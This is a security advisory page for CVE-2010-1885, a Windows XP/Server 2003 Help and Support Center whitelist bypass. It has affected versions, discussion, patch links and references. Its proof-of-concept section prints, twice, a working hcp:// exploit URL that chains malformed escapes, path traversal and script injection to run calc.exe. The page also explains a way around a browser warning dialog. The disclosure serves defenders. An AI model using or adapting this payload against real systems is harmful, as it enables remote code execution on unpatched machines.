Microsoft Windows Help And Support Center Trusted Document Whitelist Bypass Vulnerability
BID:40725
Info
Microsoft Windows Help And Support Center Trusted Document Whitelist Bypass Vulnerability
| Bugtraq ID: | 40725 |
| Class: | Design Error |
| CVE: |
CVE-2010-1885 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 10 2010 12:00AM |
| Updated: | Jul 15 2010 09:46PM |
| Credit: | Tavis Ormandy |
| Vulnerable: |
Microsoft Windows XP Tablet PC Edition SP3 Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Professional SP3 Microsoft Windows XP Professional SP2 Microsoft Windows XP Media Center Edition SP3 Microsoft Windows XP Media Center Edition SP2 Microsoft Windows XP Home SP3 Microsoft Windows XP Home SP2 Microsoft Windows Server 2003 Web Edition SP2 Microsoft Windows Server 2003 Web Edition SP1 Beta 1 Microsoft Windows Server 2003 Web Edition SP1 Microsoft Windows Server 2003 Web Edition Microsoft Windows Server 2003 Standard Edition SP2 Microsoft Windows Server 2003 Standard Edition SP1 Beta 1 Microsoft Windows Server 2003 Standard Edition SP1 Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Itanium SP2 Microsoft Windows Server 2003 Itanium SP1 Microsoft Windows Server 2003 Itanium 0 Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1 Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Microsoft Windows Server 2003 Enterprise Edition Itanium 0 Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Microsoft Windows Server 2003 Enterprise Edition SP1 Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1 Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Microsoft Windows Server 2003 Datacenter Edition Itanium 0 Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Microsoft Windows Server 2003 Datacenter Edition SP1 Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows Server 2003 R2 Platfom SDK Avaya Messaging Application Server MM 3.1 Avaya Messaging Application Server MM 3.0 Avaya Messaging Application Server MM 2.0 Avaya Messaging Application Server MM 1.1 Avaya Messaging Application Server 5 Avaya Messaging Application Server 4 Avaya Messaging Application Server 0 Avaya Meeting Exchange - Webportal 6.0 Avaya Meeting Exchange - Web Conferencing Server 0 Avaya Meeting Exchange - Streaming Server 0 Avaya Meeting Exchange - Recording Server 0 Avaya Meeting Exchange - Client Registration Server 0 |
| Not Vulnerable: | |
Discussion
Microsoft Windows Help And Support Center Trusted Document Whitelist Bypass Vulnerability
Microsoft Windows Help And Support Center is prone to a trusted document whitelist bypass vulnerability. This issue may allow remote untrusted attackers to access arbitrary help documents which may lead to various attacks.
An attacker can combine this vulnerability with another issue, such as the weakness described in BID 40721 (Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross Site Scripting Weakness) to execute arbitrary code on a vulnerable computer.
NOTE: This issue may cause Internet Explorer 8 and other browsers to launch a warning dialog box, but this protection can be evaded by placing the attacker-supplied link in a media file and supplying the file to a user through the browser, which then launches Windows Media player and doesn't cause the warning dialog to be presented. Internet Explorer 7 and prior versions do not launch any dialog boxes when this issue is triggered.
This issue is reported to affect Windows XP and Windows Server 2003; other versions of Windows may be vulnerable as well.
Microsoft Windows Help And Support Center is prone to a trusted document whitelist bypass vulnerability. This issue may allow remote untrusted attackers to access arbitrary help documents which may lead to various attacks.
An attacker can combine this vulnerability with another issue, such as the weakness described in BID 40721 (Microsoft Help and Support Center 'sysinfo/sysinfomain.htm' Cross Site Scripting Weakness) to execute arbitrary code on a vulnerable computer.
NOTE: This issue may cause Internet Explorer 8 and other browsers to launch a warning dialog box, but this protection can be evaded by placing the attacker-supplied link in a media file and supplying the file to a user through the browser, which then launches Windows Media player and doesn't cause the warning dialog to be presented. Internet Explorer 7 and prior versions do not launch any dialog boxes when this issue is triggered.
This issue is reported to affect Windows XP and Windows Server 2003; other versions of Windows may be vulnerable as well.
Exploit / POC
Microsoft Windows Help And Support Center Trusted Document Whitelist Bypass Vulnerability
Microsoft reported that this issue is being exploited in limited attacks in the wild.
The following proof-of-concept is available:
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%A..%5C..%5Csysinfomain.htm%u003f
svr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E
The following exploits are available:
Microsoft reported that this issue is being exploited in limited attacks in the wild.
The following proof-of-concept is available:
hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%
%A%%A%A..%5C..%5Csysinfomain.htm%u003f
svr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E
The following exploits are available:
Solution / Fix
Microsoft Windows Help And Support Center Trusted Document Whitelist Bypass Vulnerability
Solution:
The vendor released updates. Please see the references for more information.
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows Server 2003 Standard Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Media Center Edition SP3
Microsoft Windows Server 2003 Itanium SP2
Microsoft Windows Server 2003 Web Edition SP2
Microsoft Windows XP Home SP3
Microsoft Windows XP Professional SP3
Microsoft Windows XP Professional SP2
Microsoft Windows XP Tablet PC Edition SP3
Solution:
The vendor released updates. Please see the references for more information.
Microsoft Windows XP Media Center Edition SP2
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
Microsoft Windows Server 2003 Standard Edition SP2
-
Microsoft Security Update for Windows Server 2003 (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=CD4363B2-D7A7 -4FFF-8BCD-6FD02BD1AC07&displaylang=en -
Microsoft Security Update for Windows Server 2003 x64 Edition (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=A6BAFD3B-C921 -466D-BEE0-59A3FE126712
Microsoft Windows XP Home SP2
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
Microsoft Windows XP Tablet PC Edition SP2
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
Microsoft Windows XP Media Center Edition SP3
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
Microsoft Windows Server 2003 Itanium SP2
-
Microsoft Security Update for Windows Server 2003 for Itanium-based Systems (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=B61CC2D5-8432 -4681-AA2C-A8807EC1FCF4&displaylang=en
Microsoft Windows Server 2003 Web Edition SP2
-
Microsoft Security Update for Windows Server 2003 (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=CD4363B2-D7A7 -4FFF-8BCD-6FD02BD1AC07&displaylang=en -
Microsoft Security Update for Windows Server 2003 x64 Edition (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=A6BAFD3B-C921 -466D-BEE0-59A3FE126712
Microsoft Windows XP Home SP3
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
Microsoft Windows XP Professional SP3
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
Microsoft Windows XP Professional SP2
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
Microsoft Windows XP Tablet PC Edition SP3
-
Microsoft Security Update for Windows XP (KB2229593)
http://www.microsoft.com/downloads/details.aspx?familyid=7C2122BB-0ECF -4467-A3BA-6FB862F603C5
References
Microsoft Windows Help And Support Center Trusted Document Whitelist Bypass Vulnerability
References:
References:
- Help and Support Center vulnerability full-disclosure posting (Microsoft)
- Microsoft Security Bulletin MS10-042 - Critical (Microsoft)
- Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly (Tavis Ormandy)
- Microsoft Windows Homepage (Microsoft )
- MS10-042: Vulnerability in Help and Support Center (Microsoft Security Research & Defense)
- ASA-2010-182 MS10-042 Vulnerability in Help and SupportCenter Could Allow Remote (Avaya)
- Microsoft Security Advisory (2219475) (Microsoft)